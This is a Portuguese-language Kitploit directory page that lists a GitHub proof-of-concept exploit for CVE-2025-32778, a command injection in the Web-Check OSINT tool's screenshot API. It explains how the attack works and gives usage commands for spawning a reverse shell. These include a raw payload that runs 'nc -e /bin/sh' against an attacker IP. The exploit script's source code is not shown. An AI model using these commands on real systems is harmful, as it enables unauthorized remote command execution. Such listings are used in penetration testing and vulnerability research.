Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32778 — PoC exploit para CVE-2025-32778: injeção de comandos na ferramenta OSINT Web-Check | Kitploit
Ferramentas/GitHubGitHub/00xcanelo/cve-2025-32778
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHub00xcanelo/cve-2025-32778

CVE-2025-32778

PoC exploit para CVE-2025-32778: injeção de comandos na ferramenta OSINT Web-Check

Ver Repositório
3149há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-32778 - Exploração de Injeção de Comandos no Web-Check

Critical Language: Python

Descrição

CVE-2025-32778 é uma vulnerabilidade crítica de injeção de comandos na ferramenta OSINT Web-Check de Lissy93.
Permite que atacantes não autenticados executem comandos arbitrários do sistema através do parâmetro url na API de captura de tela.

Este script Python automatiza a exploração e pode gerar shells reversos ou aceitar payloads de shell personalizados.


Aviso

  • Teste apenas em sistemas que você possui ou está autorizado a testar.
  • O uso não autorizado é ilegal e antiético.

Funcionalidades

  • Explorar a injeção de comandos url no Web-Check.
  • Suporta:
    • Shell reverso com --lhost e --lport.
    • Shell personalizado via --shell.
  • Normalização de URL.
  • Impede a combinação de --shell com --lhost/--lport.

  • Requisitos

    • Python 3.x
    • Biblioteca Requests:
    root@kitploit:~
    pip install requests
    

    Uso

    root@kitploit:~
    git clone https://github.com/00xCanelo/CVE-2025-32778
    cd CVE-2025-32778
    

    Fazer a ferramenta criar um shell reverso

    root@kitploit:~
    python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
    

    Payload de Shell Personalizado (Bruto)

    root@kitploit:~
    python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
    

    Menu de Ajuda

    root@kitploit:~
    python3 cve-2025-32778.py -h
    

    Como Funciona

    1. Normalizar a URL alvo para scheme://host[:port].

    2. Preparar o payload:

      • Gerar um shell reverso usando --lhost e --lport.
      • Ou usar um comando bruto de shell com --shell.
    3. Codificar o payload do shell para injeção segura na URL.

    4. Enviar uma requisição HTTP GET para /api/screenshot/ com o payload.

    5. Aguardar a conexão do shell reverso.


    🧑‍💻 Autor

    00xCanelo
    Perfil no GitHub


    Referências

    • Repositório do Web-Check no GitHub – Projeto original contendo o código vulnerável.
    • CVE-2025-32778 – Entrada CVE descrevendo a vulnerabilidade de injeção de comandos.
    Baixar ferramenta